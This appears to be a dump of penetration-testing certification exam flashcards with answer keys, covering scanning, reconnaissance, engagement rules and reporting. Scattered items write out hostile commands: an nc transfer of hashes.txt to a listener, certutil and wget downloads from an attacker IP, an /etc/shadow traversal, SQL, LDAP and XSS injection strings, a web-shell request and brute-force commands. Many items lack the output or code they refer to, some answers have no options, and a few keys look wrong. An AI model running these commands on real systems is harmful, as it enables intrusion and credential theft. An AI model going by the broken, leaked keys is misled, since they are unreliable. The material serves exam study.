Dump 4 Flashcards by TheKake Unknown

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

A.
Port scan
B.
Brute force
C.
Credential stuffing
D.
DoS attack

Answer: B

How well did you know this?

Not at all

Perfectly

During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants
to identify key contacts and job responsibilities within the company. Which of the following
techniques would be the most effective for this situation?

A.
Social media scraping
B.
Website archive and caching
C.
DNS lookup
D.
File metadata analysis

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester wrote the following Bash script to brute force a local service password:

Answer: A

How well did you know this?

Not at all

Perfectly

Which of the following documents would be the most helpful in determining who is at fault for a
temporary outage that occurred during a penetration test?

A.
Non-disclosure agreement
B.
Business associate agreement
C.
Assessment scope and methodologies
D.
Executive summary

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester discovers passwords in a publicly available data breach during the
reconnaissance phase of the penetration test. Which of the following is the best action for the
tester to take?

A.
Add the passwords to an appendix in the penetration test report.
B.
Do nothing. Using passwords from breached data is unethical.
C.
Contact the client and inform them of the breach.
D.
Use the passwords in a credential stuffing attack when the external penetration test begins.

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have
more than 100 connections per minute. Which of the following commands would allow the tester to
finish the test without being blocked?

A.
nmap –sU –p 1–1024 10.0.0.15
B.
nmap –p 22, 25, 80, 3389 –T2 10.0.0.15 –Pn
C.
nmap –T5 –p 1–65535 –A 10.0.0.15
D.
nmap –T3 –F 10.0.0.15

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester runs the following command on a system:

find / –user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

A.
Set the SGID on all files in the /directory.
B.
Find the /root directory on the system.
C.
Find files with the SUID bit set.
D.
Find files that were created during exploitation and move them to /dev/null.

Answer: C

How well did you know this?

Not at all

Perfectly

Which of the following tools provides Python classes for interacting with network protocols?

A.
Responder
B.
Impacket
C.
Empire
D.
PowerSploit

Answer: B

How well did you know this?

Not at all

Perfectly

A security engineer is trying to bypass a network IPS that isolates the source when the scan
exceeds 100 packets per minute. The scope of the scan is to identify web servers in the
10.0.0.0/16 subnet. Which of the following commands should the engineer use to achieve the
objective in the least amount of time?

A.
nmap –T3 –p 80 10.0.0.0/16 ––max-hostgroup 100
B.
nmap –T0 –p 80 10.0.0.0/16
C.
nmap –T4 –p 80 10.0.0.0/16 ––max-rate 60
D.
nmap –T5 –p 80 10.0.0.0/16 ––min-rate 80

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester is performing a social engineering penetration test and was able to create a
remote session. Which of the following social engineering techniques was most likely successful?

A.
SMS phishing
B.
Dumpster diving
C.
Executive impersonation attack
D.
Browser exploitation framework

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester requested, without express authorization, that a CVE number be assigned for
a new vulnerability found on an internal client application. Which of the following did the
penetration tester most likely breach?

A.
ROE
B.
SLA
C.
NDA
D.
SOW

Answer: C

How well did you know this?

Not at all

Perfectly

Penetration-testing activities have concluded, and the initial findings have been reviewed with the
client. Which of the following best describes the NEXT step in the engagement?

A.
Performing a live demonstration of the results to the system administrators
B.
Scheduling of follow-up actions and retesting
C.
Attestation of findings and delivery of the report
D.
Review of the lessons during the engagement

Answer: C

How well did you know this?

Not at all

Perfectly

A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of
active hosts for further analysis?

A.
nmap –oG list.txt 192.168.0.1-254 | sort
B.
nmap –sn 192.168.0.1-254 | grep “Nmap scan? | awk ‘{print $5}’
C.
nmap ––open 192.168.0.1-254 | uniq | sed ‘s/Nmap//2’ > file.txt
D.
nmap –O 192.168.0.1-254 | cut –f

Answer: B

How well did you know this?

Not at all

Perfectly

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a
company’s network, with the constrained objective of gaining access to sensitive personnel files.
During the assessment, the red-team tester identifies an artifact indicating possible prior
compromise within the target environment. Which of the following actions should the tester take?

A.
Perform forensic analysis to isolate the means of compromise and determine attribution.
B.
Incorporate the newly identified method of compromise into the red team’s approach.
C.
Create a detailed document of findings before continuing with the assessment.
D.
Halt the assessment and follow the reporting procedures as outlined in the contract.

Answer: D

How well did you know this?

Not at all

Perfectly

A penetration tester identified numerous flaws that could lead to unauthorized modification of
critical data. Which of the following would be best for the penetration tester to recommend?

A.
Flat access
B.
Role-based access control
C.
Permission-based access control
D.
Group-based control model

Answer: B

How well did you know this?

Not at all

Perfectly

Which of the following tools would be the best to use to intercept an HTTP response of an API,
change its content, and forward it back to the origin mobile device?

A.
Drozer
B.
Burp Suite
C.
Android SDK Tools
D.
MobSF

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester is conducting a test after hours and notices a critical system was taken down.
Which of the following contacts should be notified first?

A.
Secondary
B.
Emergency
C.
Technical
D.
Primary

Answer: B

How well did you know this?

Not at all

Perfectly

A penetration tester wants to perform reconnaissance without being detected. Which of the
following activities have a minimal chance of detection? (Choose two.)

A.
Open-source research
B.
A ping sweep
C.
Traffic sniffing
D.
Port knocking
E.
A vulnerability scan
F.
An Nmap scan

Answer: A,C

How well did you know this?

Not at all

Perfectly

During an assessment, a penetration tester found a suspicious script that could indicate a prior
compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

A.
Spawn a local shell.
B.
Disable NIC.
C.
List processes.
D.
Change the MAC address.

Answer: D

How well did you know this?

Not at all

Perfectly

During an assessment, a penetration tester found a web component with no authentication
requirements. The web component also allows file uploads and is hosted on one of the target
public web servers. Which of the following actions should the penetration tester perform next?

A.
Continue the assessment and mark the finding as critical.
B.
Attempt to remediate the issue temporarily.
C.
Notify the primary contact immediately.
D.
Shut down the web server until the assessment is finished.

Answer: C

How well did you know this?

Not at all

Perfectly

During an assessment, a penetration tester obtains a list of password digests using Responder.
Which of the following tools would the penetration tester most likely use next?

A.
Hashcat
B.
Hydra
C.
CeWL
D.
Medusa

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester is performing a vulnerability scan on a large ATM network. One of the
organization’s requirements is that the scan does not affect legitimate clients’ usage of the ATMs.
Which of the following should the tester do to best meet the company’s vulnerability scan
requirements?

A.
Use Nmap’s-T2 switch to run a slower scan and with less resources.
B.
Run the scans using multiple machines.
C.
Run the scans only during lunch hours.
D.
Use Nmap’s-host-timeout switch to skip unresponsive targets.

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester has obtained a low-privilege shell on a Windows server with a default
configuration and now wants to explore the ability to exploit misconfigured service permissions.
Which of the following commands would help the tester start this process?

A.
certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe
B.
powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’,
‘systeminfo.txt’)
C.
schtasks /query /fo LIST /v | find /I “Next Run Time:?
D.
wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Answer: A

How well did you know this?

Not at all

Perfectly

A penetration tester issues the following command after obtaining a shell:

Which of the following describes this technique?

A.
Establishing a backdoor
B.
Privilege escalation
C.
PowerShell remoting
D.
Living-off-the-land

Answer: D

How well did you know this?

Not at all

Perfectly

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization’s sensitive files? A. Remote file inclusion B. Cross-site scripting C. SQL injection D. Insecure direct object references

Answer: D

While conducting a penetration test of a web application, the penetration tester enters the following URI: http://test.comptia.com/../../../../etc/shadow Which of the following attacks is the tester attempting? A. XML injection B. SQL injection C. Directory traversal D. Buffer overflow

Answer: C

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate background checks: Which of the following candidates should MOST likely be excluded from consideration? A. Candidate 1 B. Candidate 2 C. Candidate 3 D. Candidate 4

Answer: B

Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement? A. Engagement scope B. Communication escalation path C. SLA D. SOW

Answer: B

Given the following Bash code snippet: A. User enumeration B. Directory brute-force attack C. Port scan D. File download

Answer: D

Given the following user-supplied data: www.comptia.com/info. php?id=1 AND 1=1 Which of the following attack techniques is the penetration tester likely implementing? A. Boolean-based SQL injection B. Time-based SQL injection C. Stored cross-site scripting D. Reflected cross-site scripting

Answer: A

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following BEST explains why the penetration tester should immediately obscure portions of the images before saving? A. To maintain confidentiality of data/information B. To avoid disclosure of how the hashes were obtained C. To make the hashes appear shorter and easier to crack D. To prevent analysis based on the type of hash

Answer: A

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads? A. CeWL B. John the Ripper C. Hashcat D. Hydra

Answer: D

Given the following code: Which of the following tasks could be accomplished with the script? A. Reverse shell B. Ping sweep C. File download D. Port scan

Answer: D

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system? A. DirBuster B. Open VAS C. Scout Suite D. CeWL

Answer: A

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output: Which of the following is the MOST likely explanation for the output? A. The tester is not using a valid SSL certificate. B. The admin directory cannot be fuzzed because it is forbidden. C. The admin, test, and db directories redirect to the log-in page. D. The robots.txt file has six entries in it.

Answer: C

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets. INSTRUCTIONS Select the appropriate answer(s), given the output from each section.

Tool created this output: TheHarvester Commands for nslookup and dig output: dig @8.8.8.8 +noall +answer someclouddomain.org nslookup someclouddomain.org 8.8.8.8 WHOIS Information: Domain hosted by: Amazon Domain registered by: LocalComputerPro's, Inc. Domain registration date: 1993-09-22T04:00:38Z

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network? A. Kismet B. Burp Suite C. BeEF D. WHOIS

Answer: A

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content: Which of the following commands should the penetration tester run to successfully achieve RCE? A. python3 -c "import requests;print(requests.post(url- 'http://172.16.200.10/uploads/shell.php',data={'cmd=id'}))" B. python3 -c "import requests;print(requests.post(url- 'http://172.16.200.10/uploads/shell.php',data={'cmd': 'id'}).text)" C. python3 -c "import requests;print(requests.get(url- 'http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}))" D. python3 -c "import requests;print(requests.get(url- 'http://172.16.200.10/uploads/shell.php',params={'cmd': 'id'}).test)"

Answer: B

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code: salt = 'saltl23' hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) The penetration tester recommended the code be updated to the following: salt = os.urandom(32) hash = hashlib.pbkdf2_hmac('sha256', plaintext, salt, 10000) Which of the following steps should the penetration tester recommend? A. Changing passwords that were created before this code update B. Storing hashes created by both methods for compatibility C. Rehashing all old passwords with the new code D. Updating the SHA-256 algorithm to something more secure

Answer: A

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations? A. OWASP Top 10 B. MITRE ATT&CK C. Cyber Kill Chain D. Well-Architected Framework

Answer: B

An organization wants to identify whether a less secure protocol is being utilized on a wireless network. Which of the following types of attacks will achieve this goal? A. False negotiation B. Collision C. Bad handshake D. Downgrade

Answer: D

While a penetration tester conducts a web application assessment, the following URL is accessed: http://comptia.com/index.php?id=1%20ORR%2022-7%3d10 Which of the following exploit types is being attempted? A. XML injection B. SQL injection C. Session hijacking D. Buffer overflow

Answer: B

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic? A. dig company.com MX B. whois company.com C. curl www.company.com D. dig company.com A

Answer: A

A penetration tester runs an Nmap scan and obtains the following output: Which of the following commands should the penetration tester try next to explore this server? A. nikto -host http://10.22.2.2 B. hydra -l administrator -P passwords.txt ftp://10.22.2.2 C. nmap -p 3389 --script vnc-info.nse 10.22.2.2 D. medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql

Answer: D

During a reconnaissance exercise, a penetration tester runs the following Nmap command: nmap -sT -sV -T2 -p 1-65535 domain.com After watching the scan run for more than two hours, the tester wants to optimize the full scan. Which of the following is the best way to speed up the scan? A. Scan fewer ports list. B. Scan via UDP to improve speed. C. Change -sT to -sS. D. Keep the scan timing.

Answer: C

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network? A. Executive summary B. Vulnerability severity rating C. Recommendations of mitigation D. Methodology

Answer: B

A penetration tester is scanning a customer subnet and wants to scan ports that are known to have only well-known UDP services present. Which of the following can the tester use to scan for SNMP. NTP, NetBIOS, and DNS? A. nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan B. nmap -vv -sXV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan C. nmap -vv -sTV -p 53, 123, 137-139,161,123 192.168.1.0/24 -oA udpscan D. nmap -vv -sUV -p 53-161,192.168.1.0 -oA udpscan

Answer: A

Which of the following OSSTM testing methodologies should be used to test under the worst conditions? A. Tandem B. Reversal C. Semi-authorized D. Known environment

Answer: B

A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking the penetration tester's attack attempts. Which of the following should the tester do to best ensure the attacks will be more successful? A. Increase the volume of attacks to enable more to possibly slip through. B. Vary the use of upper and lower case characters in payloads to fool the WAF. C. Use multiple source IP addresses for the attack traffic to prevent being blocked. D. Locate the company's servers that are hosting the API and send the traffic there.

Answer: C

A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remember the use of the -t option. Which of the following should be considered when using this option? A. The number of connects in parallel per target B. The number of task connects in parallel overall C. The waiting time for a response between connects per threads D. If the output shows log-ins and passwords for each attempt

Answer: A

During a security assessment, a penetration tester decides to use the following Python snippet: Which of the following best describes what the penetration tester is trying to achieve? A. Web server denial of service B. Web application firewall bypass C. Web server response time estimation D. Web server latency estimation

Answer: A

An organization’s Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario? A. Client acceptance B. Data destruction process C. Attestation of findings D. Lessons learned

Answer: C

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next? A. Include the findings in the final report. B. Notify the client immediately. C. Document which commands can be executed. D. Use this feature to further compromise the server.

Answer: B

A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary? A. To facilitate post-engagement cleanup B. To monitor lessons learned C. To foster client acceptance D. To follow the data destruction process

Answer: A

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client? A. Operating cost B. Required scope of work C. Non-disclosure agreement D. Client's budget

Answer: B

While performing a mobile application penetration test, a security consultant notices that the user password is being locally encrypted before it is sent to the back end for authentication. Which of the following techniques would be best for the consultant to use to find the encryption algorithm and the encryption key? A. Sandbox analysis B. Information leakage C. Reverse engineering D. Brute-force attack

Answer: C

A client has requested that the penetration test scan include the following UDP services: SNMP. NetBIOS, and DNS. Which of the following Nmap commands will perform the scan? A. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan D. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan

Answer: C

A penetration tester wants to identify the most common TCP ports on 10.7.8.69. Which of the following is the best Nmap command for this task? A. nmap 10.7.8.69 -sS -sA -sV -F B. nmap 10.7.8.69 -sT -sA -p1-65535 C. nmap 10.7.8.69 -sC -sV -Pn D. nmap 10.7.8.69 -sX -sU --top-ports

Answer: A

A penetration tester is gathering information and wants to retrieve hostnames and IP addresses. Which of the following should the tester do? A. Obtain password dumps B. Implement SSL/TLS certificate analysis. C. Perform DNS lookups D. Conduct web scraping

Answer: C

A penetration tester needs to perform a vulnerability scan on a highly critical and fragile infrastructure system. Which of the following should the penetration tester do to minimize the risk? A. Implement query throttling B. Use high-bandwidth scanning techniques. C. Enable aggressive and indiscriminate scanning options D. Use a SYN flag to avoid detection

Answer: A

A penetration tester discovers a login page during an assessment. Which of the following tools would the tester use to brute force a password? A. Hydra B. Wireshark C. SQLmap D. TinEye

Answer: A

A penetration test is in the scoping phase of an engagement. Which of the following describes how a penetration tester would most effectively obtain the information necessary to begin testing? A. Wait for the client to tell them B. Start an email chain so communications are documented C. Ask previous penetration test providers what they looked at D. Send a preengagement survey to the client to fill out

Answer: D

A penetration tester would like to know if any web servers or mail servers are running on the inscope network segment. Which of the following is the best to use in this scenario? A. ARP scans B. Website crawling C. DNS lookups D. Nmap probes

Answer: D

During an engagement with a financial institution, a penetration tester found hard-coded credentials in a publicly accessible code repository. Those credentials allowed the penetration tester to access PII from many of the institution’s customers and services that are hosted by a cloud provider. Which of the following actions should the penetration tester do next? A. Proceed with the engagement and add the evidence in the final report B. Keep the found credentials and use them during the engagement C. Disclose the findings through a bug bounty platform D. Report the findings to the customer’s technical contact immediately

Answer: D

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server’s name. Which of the following is the best way for a penetration tester to exploit this situation? A. Relay the traffic to the real file server and steal documents as they pass through B. Host a malicious file to compromise the workstation C. Reply to the broadcasts with a fake IP address to deny access to the real file server D. Respond to the requests with the tester's IP address and steal authentication credentials

Answer: D

A penetration tester is conducting an engagement for a company and has identified a vulnerable web application. During the reconnaissance phase the tester discovers that the internal web application contains end-of-life components. Which of the following is the most appropriate next step? A. Report the vulnerability to the company’s IT department and provide the department with detailed information for patching the application B. Perform a brute-force attack on the web application’s log-in page to test the strength of user passwords C. Launch a denial-of-service attack against the web application to disrupt its availability and expose potential vulnerabilities D. Exploit the vulnerability to gam access to the web application’s back-end systems

Answer: D

A penetration tester performs several Nmap scans against the web application for a client. INSTRUCTIONS Click on the WAF and servers to review the results of the Nmap scans. Then click on each tab to select the appropriate vulnerability and remediation options.

Perform a SSRF attack against App01.example.com from CDN.example.com Restrict direct communications to App01.example.com to only approved components. Require an additional authentication header value between CDN.example.com and App01.example.com.

A security analyst is conducting a penetration test for an online store with a database server. Which of the following tools would best assist the tester in detecting vulnerabilities on that server? A. Burp Suite B. Nessus C. Nikto D. SQLmap

Answer: B

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field: IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");>originalAttribute="SRC"originalPath="vbscript;ms gbox ("Vulnerable_to_Attack ");>" When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application? A. SQL injection B. Command injection C. Cross-site request forgery D. Cross-site scripting

Answer: D

Which of the following legal concepts specifically outlines the scope, deliverables, and timelines of a project or engagement? A. MSA B. NDA C. SLA D. SOW

Answer: D

A client claims that a ransomware attack has crippled its corporate network following a penetration test assessment. Which of the following is the most likely root cause of this issue? A. Client reluctance to accept findings B. Lack of attestation C. Incomplete data destruction process D. Failure to remove tester-created credentials

Answer: D

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack? A. Bluejacking B. Bluesnarfing C. BLE attack D. WPS PIN attack

Answer: C

A penetration tester runs an Nmap scan and obtains the following output: Which of the following should the penetration tester run next to explore this host further? A. OpenVAS B. BloodHound C. DirBuster D. Nikto

Answer: A

A penetration tester is conducting a physical test against an organization. During the first day of the assessment, the tester follows an employee to the coffee shop next door. While the employee is ordering, the tester stands near the employee and captures the employee's badge electronically. Which of the following exploits is the penetration tester most likely conducting? A. Tailgating B. Bluesnarfing C. RFID cloning D. Session hijacking

Answer: C

As part of an active reconnaissance, a penetration tester intercepts and analyzes network traffic, including API requests and responses. Which of the following can be gained by capturing and examining the API traffic? A. Assessing the performance of the network's API communication B. Identifying the token/authentication detail C. Enumerating all users of the application D. Extracting confidential user data from the intercepted API responses

Answer: B

Which of the following is a declaration from an independent third party that lends credibility to the part of the organization undergoing the review and is required as part of an audit? A. Executive summary B. Client acceptance C. Attestation of findings D. Lessons learned

Answer: C

During an assessment, a penetration tester discovers the following code sample in a web application: "(&(userid=*)(userid=*))(|(userid=*) (userPwd={SHA1}a9993e364706816aba3e25717850c26c9cd0d89d==))"; Which of the following injections is being performed? A. Boolean SQL B. Command C. Blind SQL D. LDAP

Answer: D

A penetration tester gained access to one of the target company's servers. During the enumeration phase, the penetration tester lists the bash history and observes the following row: curl -k 'imaps://10.12.14.121' --user jsmith:Blu3moon -v Which of the following steps should the penetration tester take next? A. Brute force all mail users. B. Enumerate mall server users. C. Attempt to read email. D. Download hashes.

Answer: C

A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the end. Which of the following commands should the tester use? A. john hash.txt --format=MD5 --wordlist=seasons.txt --fork=8 --rules=base64 B. hashcat hash.txt -m 0 -a 6 seasons.txt ?d?d?d?d?s C. john hash.txt --format=Raw-MD5 --rules=jumbo --wordlist=seasons.txt D. hashcat hahs.txt -m 500 -a 7 --force -) -w 4 --opencl-device-types 1,2

Answer: B

During a penetration test, a security consultant needs to automate the hash calculation of each password in a text file and store the results in memory. Which of the following Python snippets should the tester use to accomplish this task?

Answer: A

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next? A. Vishing B. Watering hole C. Whaling D. Spear phishing

Answer: B

Which of the following best explains why a penetration tester would use ProxyChains during an assessment? A. To harvest credentials B. To use remote access tools C. To fingerprint the organization D. To automate protocols

Answer: B

A penetration tester gets a shell on a server and runs the following command: nc kaliworkstation 4444 < hashes.txt The penetration tester runs the following command on a Kali workstation: nc -nlvp 4444 > hashes.txt Which of the following best describes what the penetration tester is attempting to do? A. Exfiltrate a file from the server. B. Obtain a higher privilege reverse shell. C. Copy a file to the target server. D. Delete a file from the Kali workstation.

Answer: A

Which of the following components should a penetration tester most likely include in a report at the end of an assessment? A. Metrics and measures B. Client interviews C. Compliance information D. Business policies

Answer: A

In a standard engagement, a post-report document is provided outside of the report. This document: Does not contain specific findings Exposes vulnerabilities Can be shared publicly with outside parties that do not have an in-depth understanding about the client's network Which of the following documents is described? A. Attestation letter B. Findings report C. Executive summary D. Non-disclosure agreement

Answer: C

A penetration tester is configuring a vulnerability management solution to perform a scan of Linux servers on an enterprise network. The client wants to reduce potential disruptions as much as possible. Which of the following types of accounts should the tester use? A. Read-only user B. SSH LDAP user C. Domain administrator D. Unprivileged user

Answer: A

A penetration testing team has gained access to an organization's data center, but the team requires more time to test the attack strategy. Which of the following wireless attack techniques would be the most successful in preventing unintended interruptions? A. Captive portal B. Evil twin C. Bluejacking D. Jamming

Answer: B

A penetration tester is looking for a particular type of service and obtains the output below: Which of the following commands was executed by the tester? A. nmap -sU -pU:517 -Pn -n --script=supermicro-ipmi-config B. nmap -sU -pU:123 -Pn -n --script=ntp-monlist C. nmap -sU -pU:161 -Pn -n --script=voldemort-info D. nmap -sU -pU:37 -Pn -n --script=icap-info

Answer: B

A penetration tester is troubleshooting the right value for the urls variable that should be used in the following script: Which of the following instructions in a Python script will prevent duplicate entries in the output and work with the script above? A. [u for u in url_list if u not in url_list] B. list({u: True for u in url_list}.keys()) C. f"{u: True for u in url_list}" D. json.dumps({u: True for u in url_list}.keys())

Answer: B

While performing reconnaissance, a penetration tester runs Nmap and receives the following output: Nmap scan report for samplescan.org (44.33.55.66) Host is up (0.025s latency). Not shown: 992 closed tcp ports (conn-refused) PORT STATE 22/tcp open 23/tcp open 80/tcp open 443/tcp open Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds Which of the following ports should the penetration tester sniff the traffic on to obtain sensitive information? A. 22 B. 23 C. 80 D. 443

Answer: B

During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding? A. Password encryption B. Role-based access control C. Secrets management solution D. Time-of-day restrictions

Answer: C

A penetration tester discovers that an organization's infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities? (Choose two.) A. Virtualization B. Kubernetes C. Docker D. BIOS E. UEFI F. DNS

Answer: A,B

Given the following table: Which of the following data structures would most likely be used to store Known-good configurations of firewall rules in a Python script? A. Lists B. Trees C. Dictionaries D. Tuples

Answer: C

Which of the following tools would be best to use to conceal data in various kinds of image files? A. Kismet B. Snow C. Responder D. Metasploit

Answer: B

A penetration tester runs a reconnaissance script and would like the output in a standardized machine-readable format in order to pass the data to another application. Which of the following is the best for the tester to use? A. JSON B. Lists C. XLS D. Trees

Answer: A

Which of the following best explains why communication is a vital phase of a penetration test? A. To discuss situational awareness B. To build rapport with the emergency contact C. To explain the data destruction process D. To ensure the likelihood of future assessments

Answer: A

Which of the following describes how a penetration tester could prioritize findings in a report? A. Business mission and goats B. Cyberassets C. Network infrastructure D. Cyberthreats

Answer: D

During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?

Answer: A

A penetration tester is doing an assessment for a company that requires an external commandand- control server. The command-and-control tool should be able to use multiple types of payloads (PowerShell, SMB, and binaries) and centralize the management of compromised systems. Which of the following tools should the tester use? A. BeEF B. Covenant C. Censys D. Reaver

Answer: B

A penetration tester is gathering information about a target company for a penetration test in order to tailor the type of attacks. However, the tester is worried about sending packets to the company that could tip off the SOC before the attacks begin. Which of the following sources should the tester use to achieve this objective? A. Nmap B. Shodan C. CeWL D. Nessus

Answer: B